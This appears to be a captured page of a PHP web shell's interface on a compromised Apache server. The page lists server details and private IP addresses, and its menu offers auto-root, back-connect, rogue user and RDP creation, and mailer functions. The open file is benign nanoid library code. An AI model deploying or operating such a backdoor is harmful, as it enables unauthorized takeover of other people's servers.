Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
nanoid /
async /
[ HOME SHELL ]
Name
Size
Permission
Action
index.browser.cjs
983
B
-rw-rw-r--
index.browser.js
973
B
-rw-rw-r--
index.cjs
993
B
-rw-rw-r--
index.d.ts
1.47
KB
-rw-rw-r--
index.js
976
B
-rw-rw-r--
index.native.js
814
B
-rw-rw-r--
package.json
233
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cjs
let crypto = require('crypto') let { urlAlphabet } = require('../url-alphabet/index.cjs') let random = bytes => new Promise((resolve, reject) => { crypto.randomFill(Buffer.allocUnsafe(bytes), (err, buf) => { if (err) { reject(err) } else { resolve(buf) } }) }) let customAlphabet = (alphabet, defaultSize = 21) => { let mask = (2 << (31 - Math.clz32((alphabet.length - 1) | 1))) - 1 let step = Math.ceil((1.6 * mask * defaultSize) / alphabet.length) let tick = (id, size = defaultSize) => random(step).then(bytes => { let i = step while (i--) { id += alphabet[bytes[i] & mask] || '' if (id.length === size) return id } return tick(id, size) }) return size => tick('', size) } let nanoid = (size = 21) => random(size).then(bytes => { let id = '' while (size--) { id += urlAlphabet[bytes[size] & 63] } return id }) module.exports = { nanoid, customAlphabet, random }
Close